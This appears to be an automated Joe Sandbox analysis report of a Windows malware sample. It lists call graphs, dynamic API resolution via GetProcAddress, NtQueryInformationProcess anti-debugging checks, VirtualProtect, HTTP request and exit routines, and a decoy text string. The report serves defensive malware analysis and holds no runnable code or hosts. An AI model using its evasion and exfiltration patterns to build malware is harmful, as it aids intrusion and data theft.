d345c0 2 API calls 13916->13917 13918 d3387a 13917->13918 13919 d345c0 2 API calls 13918->13919 13920 d33893 13919->13920 13921 d345c0 2 API calls 13920->13921 13922 d338ac 13921->13922 13923 d345c0 2 API calls 13922->13923 13924 d338c5 13923->13924 
13925 d345c0 2 API calls 13924->13925 13926 d338de 13925->13926 13927 d345c0 2 API calls 13926->13927 13928 d338f7 13927->13928 13929 d345c0 2 API calls 13928->13929 13930 d33910 13929->13930 13931 d345c0 2 API calls 13930->13931 13932 d33929 13931->13932 13933 d345c0 2 API calls 13932->13933 13934 d33942 13933->13934 13935 d345c0 2 API calls 13934->13935 13936 d3395b 13935->13936 13937 d345c0 2 API calls 13936->13937 13938 d33974 13937->13938 13939 d345c0 2 API calls 13938->13939 13940 d3398d 13939->13940 13941 d345c0 2 API calls 13940->13941 13942 d339a6 13941->13942 13943 d345c0 2 API calls 13942->13943 13944 d339bf 13943->13944 13945 d345c0 2 API calls 13944->13945 13946 d339d8 13945->13946 13947 d345c0 2 API calls 13946->13947 13948 d339f1 13947->13948 13949 d345c0 2 API calls 13948->13949 13950 d33a0a 13949->13950 13951 d345c0 2 API calls 13950->13951 13952 d33a23 13951->13952 13953 d345c0 2 API calls 13952->13953 13954 d33a3c 13953->13954 13955 d345c0 2 API calls 13954->13955 13956 d33a55 13955->13956 13957 d345c0 2 API calls 13956->13957 13958 d33a6e 13957->13958 13959 d345c0 2 API calls 13958->13959 13960 d33a87 13959->13960 13961 d345c0 2 API calls 13960->13961 13962 d33aa0 13961->13962 13963 d345c0 2 API calls 13962->13963 13964 d33ab9 13963->13964 13965 d345c0 2 API calls 13964->13965 13966 d33ad2 13965->13966 13967 d345c0 2 API calls 13966->13967 13968 d33aeb 13967->13968 13969 d345c0 2 API calls 13968->13969 13970 d33b04 13969->13970 13971 d345c0 2 API calls 13970->13971 13972 d33b1d 13971->13972 13973 d345c0 2 API calls 13972->13973 13974 d33b36 13973->13974 13975 d345c0 2 API calls 13974->13975 13976 d33b4f 13975->13976 13977 d345c0 2 API calls 13976->13977 13978 d33b68 13977->13978 13979 d345c0 2 API calls 13978->13979 13980 d33b81 13979->13980 13981 d345c0 2 API calls 13980->13981 13982 d33b9a 13981->13982 13983 d345c0 2 API calls 13982->13983 13984 d33bb3 13983->13984 13985 d345c0 2 API calls 13984->13985 13986 d33bcc 13985->13986 13987 d345c0 2 
API calls 13986->13987 13988 d33be5 13987->13988 13989 d345c0 2 API calls 13988->13989 13990 d33bfe 13989->13990 13991 d345c0 2 API calls 13990->13991 13992 d33c17 13991->13992 13993 d345c0 2 API calls 13992->13993 13994 d33c30 13993->13994 13995 d345c0 2 API calls 13994->13995 13996 d33c49 13995->13996 13997 d345c0 2 API calls 13996->13997 13998 d33c62 13997->13998 13999 d345c0 2 API calls 13998->13999 14000 d33c7b 13999->14000 14001 d345c0 2 API calls 14000->14001 14002 d33c94 14001->14002 14003 d345c0 2 API calls 14002->14003 14004 d33cad 14003->14004 14005 d345c0 2 API calls 14004->14005 14006 d33cc6 14005->14006 14007 d345c0 2 API calls 14006->14007 14008 d33cdf 14007->14008 14009 d345c0 2 API calls 14008->14009 14010 d33cf8 14009->14010 14011 d345c0 2 API calls 14010->14011 14012 d33d11 14011->14012 14013 d345c0 2 API calls 14012->14013 14014 d33d2a 14013->14014 14015 d345c0 2 API calls 14014->14015 14016 d33d43 14015->14016 14017 d345c0 2 API calls 14016->14017 14018 d33d5c 14017->14018 14019 d345c0 2 API calls 14018->14019 14020 d33d75 14019->14020 14021 d345c0 2 API calls 14020->14021 14022 d33d8e 14021->14022 14023 d345c0 2 API calls 14022->14023 14024 d33da7 14023->14024 14025 d345c0 2 API calls 14024->14025 14026 d33dc0 14025->14026 14027 d345c0 2 API calls 14026->14027 14028 d33dd9 14027->14028 14029 d345c0 2 API calls 14028->14029 14030 d33df2 14029->14030 14031 d345c0 2 API calls 14030->14031 14032 d33e0b 14031->14032 14033 d345c0 2 API calls 14032->14033 14034 d33e24 14033->14034 14035 d345c0 2 API calls 14034->14035 14036 d33e3d 14035->14036 14037 d345c0 2 API calls 14036->14037 14038 d33e56 14037->14038 14039 d345c0 2 API calls 14038->14039 14040 d33e6f 14039->14040 14041 d345c0 2 API calls 14040->14041 14042 d33e88 14041->14042 14043 d345c0 2 API calls 14042->14043 14044 d33ea1 14043->14044 14045 d345c0 2 API calls 14044->14045 14046 d33eba 14045->14046 14047 d345c0 2 API calls 14046->14047 14048 d33ed3 14047->14048 14049 d345c0 2 API calls 
14048->14049 14050 d33eec 14049->14050 14051 d345c0 2 API calls 14050->14051 14052 d33f05 14051->14052 14053 d345c0 2 API calls 14052->14053 14054 d33f1e 14053->14054 14055 d345c0 2 API calls 14054->14055 14056 d33f37 14055->14056 14057 d345c0 2 API calls 14056->14057 14058 d33f50 14057->14058 14059 d345c0 2 API calls 14058->14059 14060 d33f69 14059->14060 14061 d345c0 2 API calls 14060->14061 14062 d33f82 14061->14062 14063 d345c0 2 API calls 14062->14063 14064 d33f9b 14063->14064 14065 d345c0 2 API calls 14064->14065 14066 d33fb4 14065->14066 14067 d345c0 2 API calls 14066->14067 14068 d33fcd 14067->14068 14069 d345c0 2 API calls 14068->14069 14070 d33fe6 14069->14070 14071 d345c0 2 API calls 14070->14071 14072 d33fff 14071->14072 14073 d345c0 2 API calls 14072->14073 14074 d34018 14073->14074 14075 d345c0 2 API calls 14074->14075 14076 d34031 14075->14076 14077 d345c0 2 API calls 14076->14077 14078 d3404a 14077->14078 14079 d345c0 2 API calls 14078->14079 14080 d34063 14079->14080 14081 d345c0 2 API calls 14080->14081 14082 d3407c 14081->14082 14083 d345c0 2 API calls 14082->14083 14084 d34095 14083->14084 14085 d345c0 2 API calls 14084->14085 14086 d340ae 14085->14086 14087 d345c0 2 API calls 14086->14087 14088 d340c7 14087->14088 14089 d345c0 2 API calls 14088->14089 14090 d340e0 14089->14090 14091 d345c0 2 API calls 14090->14091 14092 d340f9 14091->14092 14093 d345c0 2 API calls 14092->14093 14094 d34112 14093->14094 14095 d345c0 2 API calls 14094->14095 14096 d3412b 14095->14096 14097 d345c0 2 API calls 14096->14097 14098 d34144 14097->14098 14099 d345c0 2 API calls 14098->14099 14100 d3415d 14099->14100 14101 d345c0 2 API calls 14100->14101 14102 d34176 14101->14102 14103 d345c0 2 API calls 14102->14103 14104 d3418f 14103->14104 14105 d345c0 2 API calls 14104->14105 14106 d341a8 14105->14106 14107 d345c0 2 API calls 14106->14107 14108 d341c1 14107->14108 14109 d345c0 2 API calls 14108->14109 14110 d341da 14109->14110 14111 d345c0 2 API calls 14110->14111 
14112 d341f3 14111->14112 14113 d345c0 2 API calls 14112->14113 14114 d3420c 14113->14114 14115 d345c0 2 API calls 14114->14115 14116 d34225 14115->14116 14117 d345c0 2 API calls 14116->14117 14118 d3423e 14117->14118 14119 d345c0 2 API calls 14118->14119 14120 d34257 14119->14120 14121 d345c0 2 API calls 14120->14121 14122 d34270 14121->14122 14123 d345c0 2 API calls 14122->14123 14124 d34289 14123->14124 14125 d345c0 2 API calls 14124->14125 14126 d342a2 14125->14126 14127 d345c0 2 API calls 14126->14127 14128 d342bb 14127->14128 14129 d345c0 2 API calls 14128->14129 14130 d342d4 14129->14130 14131 d345c0 2 API calls 14130->14131 14132 d342ed 14131->14132 14133 d345c0 2 API calls 14132->14133 14134 d34306 14133->14134 14135 d345c0 2 API calls 14134->14135 14136 d3431f 14135->14136 14137 d345c0 2 API calls 14136->14137 14138 d34338 14137->14138 14139 d345c0 2 API calls 14138->14139 14140 d34351 14139->14140 14141 d345c0 2 API calls 14140->14141 14142 d3436a 14141->14142 14143 d345c0 2 API calls 14142->14143 14144 d34383 14143->14144 14145 d345c0 2 API calls 14144->14145 14146 d3439c 14145->14146 14147 d345c0 2 API calls 14146->14147 14148 d343b5 14147->14148 14149 d345c0 2 API calls 14148->14149 14150 d343ce 14149->14150 14151 d345c0 2 API calls 14150->14151 14152 d343e7 14151->14152 14153 d345c0 2 API calls 14152->14153 14154 d34400 14153->14154 14155 d345c0 2 API calls 14154->14155 14156 d34419 14155->14156 14157 d345c0 2 API calls 14156->14157 14158 d34432 14157->14158 14159 d345c0 2 API calls 14158->14159 14160 d3444b 14159->14160 14161 d345c0 2 API calls 14160->14161 14162 d34464 14161->14162 14163 d345c0 2 API calls 14162->14163 14164 d3447d 14163->14164 14165 d345c0 2 API calls 14164->14165 14166 d34496 14165->14166 14167 d345c0 2 API calls 14166->14167 14168 d344af 14167->14168 14169 d345c0 2 API calls 14168->14169 14170 d344c8 14169->14170 14171 d345c0 2 API calls 14170->14171 14172 d344e1 14171->14172 14173 d345c0 2 API calls 14172->14173 14174 d344fa 
14173->14174 14175 d345c0 2 API calls 14174->14175 14176 d34513 14175->14176 14177 d345c0 2 API calls 14176->14177 14178 d3452c 14177->14178 14179 d345c0 2 API calls 14178->14179 14180 d34545 14179->14180 14181 d345c0 2 API calls 14180->14181 14182 d3455e 14181->14182 14183 d345c0 2 API calls 14182->14183 14184 d34577 14183->14184 14185 d345c0 2 API calls 14184->14185 14186 d34590 14185->14186 14187 d345c0 2 API calls 14186->14187 14188 d345a9 14187->14188 14189 d49c10 14188->14189 14190 d4a036 8 API calls 14189->14190 14191 d49c20 43 API calls 14189->14191 14192 d4a146 14190->14192 14193 d4a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14190->14193 14191->14190 14194 d4a216 14192->14194 14195 d4a153 8 API calls 14192->14195 14193->14192 14196 d4a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14194->14196 14197 d4a298 14194->14197 14195->14194 14196->14197 14198 d4a2a5 6 API calls 14197->14198 14199 d4a337 14197->14199 14198->14199 14200 d4a344 9 API calls 14199->14200 14201 d4a41f 14199->14201 14200->14201 14202 d4a4a2 14201->14202 14203 d4a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14201->14203 14204 d4a4dc 14202->14204 14205 d4a4ab GetProcAddress GetProcAddress 14202->14205 14203->14202 14206 d4a515 14204->14206 14207 d4a4e5 GetProcAddress GetProcAddress 14204->14207 14205->14204 14208 d4a612 14206->14208 14209 d4a522 10 API calls 14206->14209 14207->14206 14210 d4a67d 14208->14210 14211 d4a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14208->14211 14209->14208 14212 d4a686 GetProcAddress 14210->14212 14213 d4a69e 14210->14213 14211->14210 14212->14213 14214 d4a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14213->14214 14215 d45ca3 14213->14215 14214->14215 14216 d31590 14215->14216 15335 d31670 14216->15335 14219 d4a7a0 lstrcpy 14220 d315b5 14219->14220 14221 d4a7a0 lstrcpy 14220->14221 14222 d315c7 14221->14222 14223 d4a7a0 
lstrcpy 14222->14223 14224 d315d9 14223->14224 14225 d4a7a0 lstrcpy 14224->14225 14226 d31663 14225->14226 14227 d45510 14226->14227 14228 d45521 14227->14228 14229 d4a820 2 API calls 14228->14229 14230 d4552e 14229->14230 14231 d4a820 2 API calls 14230->14231 14232 d4553b 14231->14232 14233 d4a820 2 API calls 14232->14233 14234 d45548 14233->14234 14235 d4a740 lstrcpy 14234->14235 14236 d45555 14235->14236 14237 d4a740 lstrcpy 14236->14237 14238 d45562 14237->14238 14239 d4a740 lstrcpy 14238->14239 14240 d4556f 14239->14240 14241 d4a740 lstrcpy 14240->14241 14281 d4557c 14241->14281 14242 d4a740 lstrcpy 14242->14281 14243 d45643 StrCmpCA 14243->14281 14244 d456a0 StrCmpCA 14245 d457dc 14244->14245 14244->14281 14246 d4a8a0 lstrcpy 14245->14246 14247 d457e8 14246->14247 14248 d4a820 2 API calls 14247->14248 14250 d457f6 14248->14250 14249 d4a820 lstrlen lstrcpy 14249->14281 14252 d4a820 2 API calls 14250->14252 14251 d45856 StrCmpCA 14253 d45991 14251->14253 14251->14281 14255 d45805 14252->14255 14254 d4a8a0 lstrcpy 14253->14254 14256 d4599d 14254->14256 14257 d31670 lstrcpy 14255->14257 14258 d4a820 2 API calls 14256->14258 14278 d45811 14257->14278 14259 d459ab 14258->14259 14262 d4a820 2 API calls 14259->14262 14260 d45a0b StrCmpCA 14263 d45a16 Sleep 14260->14263 14264 d45a28 14260->14264 14261 d452c0 25 API calls 14261->14281 14265 d459ba 14262->14265 14263->14281 14266 d4a8a0 lstrcpy 14264->14266 14267 d31670 lstrcpy 14265->14267 14268 d45a34 14266->14268 14267->14278 14269 d4a820 2 API calls 14268->14269 14271 d45a43 14269->14271 14270 d451f0 20 API calls 14270->14281 14272 d4a820 2 API calls 14271->14272 14273 d45a52 14272->14273 14276 d31670 lstrcpy 14273->14276 14274 d4a8a0 lstrcpy 14274->14281 14275 d4578a StrCmpCA 14275->14281 14276->14278 14277 d4a7a0 lstrcpy 14277->14281 14278->13334 14279 d4593f StrCmpCA 14279->14281 14280 d31590 lstrcpy 14280->14281 14281->14242 14281->14243 14281->14244 14281->14249 14281->14251 14281->14260 14281->14261 
14281->14270 14281->14274 14281->14275 14281->14277 14281->14279 14281->14280 14283 d47553 GetVolumeInformationA 14282->14283 14284 d4754c 14282->14284 14285 d47591 14283->14285 14284->14283 14286 d475fc GetProcessHeap RtlAllocateHeap 14285->14286 14287 d47628 wsprintfA 14286->14287 14288 d47619 14286->14288 14290 d4a740 lstrcpy 14287->14290 14289 d4a740 lstrcpy 14288->14289 14291 d45da7 14289->14291 14290->14291 14291->13355 14293 d4a7a0 lstrcpy 14292->14293 14294 d34899 14293->14294 15344 d347b0 14294->15344 14296 d348a5 14297 d4a740 lstrcpy 14296->14297 14298 d348d7 14297->14298 14299 d4a740 lstrcpy 14298->14299 14300 d348e4 14299->14300 14301 d4a740 lstrcpy 14300->14301 14302 d348f1 14301->14302 14303 d4a740 lstrcpy 14302->14303 14304 d348fe 14303->14304 14305 d4a740 lstrcpy 14304->14305 14306 d3490b InternetOpenA StrCmpCA 14305->14306 14307 d34944 14306->14307 14308 d34ecb InternetCloseHandle 14307->14308 15350 d48b60 14307->15350 14310 d34ee8 14308->14310 15365 d39ac0 CryptStringToBinaryA 14310->15365 14311 d34963 15358 d4a920 14311->15358 14314 d34976 14316 d4a8a0 lstrcpy 14314->14316 14321 d3497f 14316->14321 14317 d4a820 2 API calls 14318 d34f05 14317->14318 14320 d4a9b0 4 API calls 14318->14320 14319 d34f27 ctype 14323 d4a7a0 lstrcpy 14319->14323 14322 d34f1b 14320->14322 14325 d4a9b0 4 API calls 14321->14325 14324 d4a8a0 lstrcpy 14322->14324 14336 d34f57 14323->14336 14324->14319 14326 d349a9 14325->14326 14327 d4a8a0 lstrcpy 14326->14327 14328 d349b2 14327->14328 14329 d4a9b0 4 API calls 14328->14329 14330 d349d1 14329->14330 14331 d4a8a0 lstrcpy 14330->14331 14332 d349da 14331->14332 14333 d4a920 3 API calls 14332->14333 14334 d349f8 14333->14334 14335 d4a8a0 lstrcpy 14334->14335 14337 d34a01 14335->14337 14336->13358 14338 d4a9b0 4 API calls 14337->14338 14339 d34a20 14338->14339 14340 d4a8a0 lstrcpy 14339->14340 14341 d34a29 14340->14341 14342 d4a9b0 4 API calls 14341->14342 14343 d34a48 14342->14343 14344 d4a8a0 lstrcpy 14343->14344 14345 d34a51 
14344->14345 14346 d4a9b0 4 API calls 14345->14346 14347 d34a7d 14346->14347 14348 d4a920 3 API calls 14347->14348 14349 d34a84 14348->14349 14350 d4a8a0 lstrcpy 14349->14350 14351 d34a8d 14350->14351 14352 d34aa3 InternetConnectA 14351->14352 14352->14308 14353 d34ad3 HttpOpenRequestA 14352->14353 14355 d34b28 14353->14355 14356 d34ebe InternetCloseHandle 14353->14356 14357 d4a9b0 4 API calls 14355->14357 14356->14308 14358 d34b3c 14357->14358 14359 d4a8a0 lstrcpy 14358->14359 14360 d34b45 14359->14360 14361 d4a920 3 API calls 14360->14361 14362 d34b63 14361->14362 14363 d4a8a0 lstrcpy 14362->14363 14364 d34b6c 14363->14364 14365 d4a9b0 4 API calls 14364->14365 14366 d34b8b 14365->14366 14367 d4a8a0 lstrcpy 14366->14367 14368 d34b94 14367->14368 14369 d4a9b0 4 API calls 14368->14369 14370 d34bb5 14369->14370 14371 d4a8a0 lstrcpy 14370->14371 14372 d34bbe 14371->14372 14373 d4a9b0 4 API calls 14372->14373 14374 d34bde 14373->14374 14375 d4a8a0 lstrcpy 14374->14375 14376 d34be7 14375->14376 14377 d4a9b0 4 API calls 14376->14377 14378 d34c06 14377->14378 14379 d4a8a0 lstrcpy 14378->14379 14380 d34c0f 14379->14380 14381 d4a920 3 API calls 14380->14381 14382 d34c2d 14381->14382 14383 d4a8a0 lstrcpy 14382->14383 14384 d34c36 14383->14384 14385 d4a9b0 4 API calls 14384->14385 14386 d34c55 14385->14386 14387 d4a8a0 lstrcpy 14386->14387 14388 d34c5e 14387->14388 14389 d4a9b0 4 API calls 14388->14389 14390 d34c7d 14389->14390 14391 d4a8a0 lstrcpy 14390->14391 14392 d34c86 14391->14392 14393 d4a920 3 API calls 14392->14393 14394 d34ca4 14393->14394 14395 d4a8a0 lstrcpy 14394->14395 14396 d34cad 14395->14396 14397 d4a9b0 4 API calls 14396->14397 14398 d34ccc 14397->14398 14399 d4a8a0 lstrcpy 14398->14399 14400 d34cd5 14399->14400 14401 d4a9b0 4 API calls 14400->14401 14402 d34cf6 14401->14402 14403 d4a8a0 lstrcpy 14402->14403 14404 d34cff 14403->14404 14405 d4a9b0 4 API calls 14404->14405 14406 d34d1f 14405->14406 14407 d4a8a0 lstrcpy 14406->14407 14408 d34d28 14407->14408 
14409 d4a9b0 4 API calls 14408->14409 14410 d34d47 14409->14410 14411 d4a8a0 lstrcpy 14410->14411 14412 d34d50 14411->14412 14413 d4a920 3 API calls 14412->14413 14414 d34d6e 14413->14414 14415 d4a8a0 lstrcpy 14414->14415 14416 d34d77 14415->14416 14417 d4a740 lstrcpy 14416->14417 14418 d34d92 14417->14418 14419 d4a920 3 API calls 14418->14419 14420 d34db3 14419->14420 14421 d4a920 3 API calls 14420->14421 14422 d34dba 14421->14422 14423 d4a8a0 lstrcpy 14422->14423 14424 d34dc6 14423->14424 14425 d34de7 lstrlen 14424->14425 14426 d34dfa 14425->14426 14427 d34e03 lstrlen 14426->14427 15364 d4aad0 14427->15364 14429 d34e13 HttpSendRequestA 14430 d34e32 InternetReadFile 14429->14430 14431 d34e67 InternetCloseHandle 14430->14431 14436 d34e5e 14430->14436 14433 d4a800 14431->14433 14433->14356 14434 d4a9b0 4 API calls 14434->14436 14435 d4a8a0 lstrcpy 14435->14436 14436->14430 14436->14431 14436->14434 14436->14435 15371 d4aad0 14437->15371 14439 d417c4 StrCmpCA 14440 d417cf ExitProcess 14439->14440 14452 d417d7 14439->14452 14441 d419c2 14441->13360 14442 d41970 StrCmpCA 14442->14452 14443 d418f1 StrCmpCA 14443->14452 14444 d41951 StrCmpCA 14444->14452 14445 d41932 StrCmpCA 14445->14452 14446 d41913 StrCmpCA 14446->14452 14447 d4185d StrCmpCA 14447->14452 14448 d4187f StrCmpCA 14448->14452 14449 d418ad StrCmpCA 14449->14452 14450 d418cf StrCmpCA 14450->14452 14451 d4a820 lstrlen lstrcpy 14451->14452 14452->14441 14452->14442 14452->14443 14452->14444 14452->14445 14452->14446 14452->14447 14452->14448 14452->14449 14452->14450 14452->14451 14454 d4a7a0 lstrcpy 14453->14454 14455 d35979 14454->14455 14456 d347b0 2 API calls 14455->14456 14457 d35985 14456->14457 14458 d4a740 lstrcpy 14457->14458 14459 d359ba 14458->14459 14460 d4a740 lstrcpy 14459->14460 14461 d359c7 14460->14461 14462 d4a740 lstrcpy 14461->14462 14463 d359d4 14462->14463 14464 d4a740 lstrcpy 14463->14464 14465 d359e1 14464->14465 14466 d4a740 lstrcpy 14465->14466 14467 d359ee InternetOpenA StrCmpCA 
14466->14467 14468 d35a1d 14467->14468 14469 d35fc3 InternetCloseHandle 14468->14469 14471 d48b60 3 API calls 14468->14471 14470 d35fe0 14469->14470 14474 d39ac0 4 API calls 14470->14474 14472 d35a3c 14471->14472 14473 d4a920 3 API calls 14472->14473 14475 d35a4f 14473->14475 14476 d35fe6 14474->14476 14477 d4a8a0 lstrcpy 14475->14477 14478 d4a820 2 API calls 14476->14478 14480 d3601f ctype 14476->14480 14482 d35a58 14477->14482 14479 d35ffd 14478->14479 14481 d4a9b0 4 API calls 14479->14481 14484 d4a7a0 lstrcpy 14480->14484 14483 d36013 14481->14483 14486 d4a9b0 4 API calls 14482->14486 14485 d4a8a0 lstrcpy 14483->14485 14494 d3604f 14484->14494 14485->14480 14487 d35a82 14486->14487 14488 d4a8a0 lstrcpy 14487->14488 14489 d35a8b 14488->14489 14490 d4a9b0 4 API calls 14489->14490 14491 d35aaa 14490->14491 14492 d4a8a0 lstrcpy 14491->14492 14493 d35ab3 14492->14493 14495 d4a920 3 API calls 14493->14495 14494->13366 14496 d35ad1 14495->14496 14497 d4a8a0 lstrcpy 14496->14497 14498 d35ada 14497->14498 14499 d4a9b0 4 API calls 14498->14499 14500 d35af9 14499->14500 14501 d4a8a0 lstrcpy 14500->14501 14502 d35b02 14501->14502 14503 d4a9b0 4 API calls 14502->14503 14504 d35b21 14503->14504 14505 d4a8a0 lstrcpy 14504->14505 14506 d35b2a 14505->14506 14507 d4a9b0 4 API calls 14506->14507 14508 d35b56 14507->14508 14509 d4a920 3 API calls 14508->14509 14510 d35b5d 14509->14510 14511 d4a8a0 lstrcpy 14510->14511 14512 d35b66 14511->14512 14513 d35b7c InternetConnectA 14512->14513 14513->14469 14514 d35bac HttpOpenRequestA 14513->14514 14516 d35fb6 InternetCloseHandle 14514->14516 14517 d35c0b 14514->14517 14516->14469 14518 d4a9b0 4 API calls 14517->14518 14519 d35c1f 14518->14519 14520 d4a8a0 lstrcpy 14519->14520 14521 d35c28 14520->14521 14522 d4a920 3 API calls 14521->14522 14523 d35c46 14522->14523 14524 d4a8a0 lstrcpy 14523->14524 14525 d35c4f 14524->14525 14526 d4a9b0 4 API calls 14525->14526 14527 d35c6e 14526->14527 14528 d4a8a0 lstrcpy 14527->14528 14529 d35c77 

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 d49860-d49874 call d49750 663 d49a93-d49af2 LoadLibraryA * 5 660->663 664 d4987a-d49a8e call d49780 GetProcAddress * 21 660->664 666 d49af4-d49b08 GetProcAddress 663->666 667 d49b0d-d49b14 663->667 664->663 666->667 669 d49b46-d49b4d 667->669 670 d49b16-d49b41 GetProcAddress * 2 667->670 671 d49b4f-d49b63 GetProcAddress 669->671 672 d49b68-d49b6f 669->672 670->669 671->672 673 d49b71-d49b84 GetProcAddress 672->673 674 d49b89-d49b90 672->674 673->674 675 d49bc1-d49bc2 674->675 676 d49b92-d49bbc GetProcAddress * 2 674->676 676->675
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,00AF2380), ref: 00D498A1
                  • GetProcAddress.KERNEL32(74DD0000,00AF2260), ref: 00D498BA
                  • GetProcAddress.KERNEL32(74DD0000,00AF2308), ref: 00D498D2
                  • GetProcAddress.KERNEL32(74DD0000,00AF22C0), ref: 00D498EA
                  • GetProcAddress.KERNEL32(74DD0000,00AF2218), ref: 00D49903
                  • GetProcAddress.KERNEL32(74DD0000,00AF8F98), ref: 00D4991B
                  • GetProcAddress.KERNEL32(74DD0000,00AE5AF0), ref: 00D49933
                  • GetProcAddress.KERNEL32(74DD0000,00AE5C90), ref: 00D4994C
                  • GetProcAddress.KERNEL32(74DD0000,00AF23B0), ref: 00D49964
                  • GetProcAddress.KERNEL32(74DD0000,00AF2470), ref: 00D4997C
                  • GetProcAddress.KERNEL32(74DD0000,00AF2440), ref: 00D49995
                  • GetProcAddress.KERNEL32(74DD0000,00AF2458), ref: 00D499AD
                  • GetProcAddress.KERNEL32(74DD0000,00AE5D70), ref: 00D499C5
                  • GetProcAddress.KERNEL32(74DD0000,00AF24A0), ref: 00D499DE
                  • GetProcAddress.KERNEL32(74DD0000,00AF2278), ref: 00D499F6
                  • GetProcAddress.KERNEL32(74DD0000,00AE5CB0), ref: 00D49A0E
                  • GetProcAddress.KERNEL32(74DD0000,00AF24B8), ref: 00D49A27
                  • GetProcAddress.KERNEL32(74DD0000,00AF2320), ref: 00D49A3F
                  • GetProcAddress.KERNEL32(74DD0000,00AE5E50), ref: 00D49A57
                  • GetProcAddress.KERNEL32(74DD0000,00AF2230), ref: 00D49A70
                  • GetProcAddress.KERNEL32(74DD0000,00AE5B90), ref: 00D49A88
                  • LoadLibraryA.KERNEL32(00AF2590,?,00D46A00), ref: 00D49A9A
                  • LoadLibraryA.KERNEL32(00AF2578,?,00D46A00), ref: 00D49AAB
                  • LoadLibraryA.KERNEL32(00AF25A8,?,00D46A00), ref: 00D49ABD
                  • LoadLibraryA.KERNEL32(00AF25C0,?,00D46A00), ref: 00D49ACF
                  • LoadLibraryA.KERNEL32(00AF25D8,?,00D46A00), ref: 00D49AE0
                  • GetProcAddress.KERNEL32(75A70000,00AF2518), ref: 00D49B02
                  • GetProcAddress.KERNEL32(75290000,00AF2530), ref: 00D49B23
                  • GetProcAddress.KERNEL32(75290000,00AF2548), ref: 00D49B3B
                  • GetProcAddress.KERNEL32(75BD0000,00AF2560), ref: 00D49B5D
                  • GetProcAddress.KERNEL32(75450000,00AE5DF0), ref: 00D49B7E
                  • GetProcAddress.KERNEL32(76E90000,00AF8F58), ref: 00D49B9F
                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D49BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00D49BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 9732b54038fcc10b284c362daef6d28e8bd04c267c04b5789f6f3004dd46c566
                  • Instruction ID: e5cc3c57073bc171a6ccc2a1b5f938952a685cd7eae74e5342efb8dc1d25a0eb
                  • Opcode Fuzzy Hash: 9732b54038fcc10b284c362daef6d28e8bd04c267c04b5789f6f3004dd46c566
                  • Instruction Fuzzy Hash: 5EA13BB55042489FD348EFA8ED89D6E3BF9F7CC301706451AA61DC3264D63998C2EB63

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 d345c0-d34695 RtlAllocateHeap 781 d346a0-d346a6 764->781 782 d3474f-d347a9 VirtualProtect 781->782 783 d346ac-d3474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D3460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D3479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34617, 00D34678, 00D3466D, 00D3473F, 00D34683, 00D34734, 00D3474F, 00D346D8, 00D34713, 00D345C7, 00D34729, 00D345E8, 00D345F3, 00D3477B, 00D34643, 00D34765, 00D345DD, 00D346CD, 00D346B7, 00D346C2, 00D34657, 00D346AC, 00D3475A, 00D34638, 00D34662, 00D345D2, 00D34770, 00D34622, 00D3471E, 00D3462D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
